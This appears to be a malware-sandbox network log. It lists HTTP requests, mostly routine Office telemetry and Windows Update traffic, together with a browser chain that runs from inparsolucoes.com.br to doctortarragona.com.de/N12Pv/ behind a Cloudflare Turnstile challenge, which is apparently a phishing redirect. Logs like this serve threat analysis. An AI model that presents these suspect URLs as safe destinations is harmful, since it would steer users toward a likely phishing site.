Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.inparsolucoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /N12Pv/ HTTP/1.1Host: doctortarragona.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.inparsolucoes.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H2D+HCngALeUZfR&MD=mAexEuHX HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://doctortarragona.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://doctortarragona.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://doctortarragona.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: doctortarragona.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://doctortarragona.com.de/N12Pv/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=0mfnhep7j7q3smgp3fqq79762i
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://doctortarragona.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
